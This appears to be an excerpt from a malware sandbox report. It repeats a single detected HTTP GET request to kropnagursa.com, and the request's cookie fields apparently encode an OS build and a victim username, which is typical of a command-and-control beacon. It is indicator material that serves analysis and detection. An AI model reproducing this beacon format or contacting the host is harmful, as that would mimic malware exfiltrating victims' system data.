            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
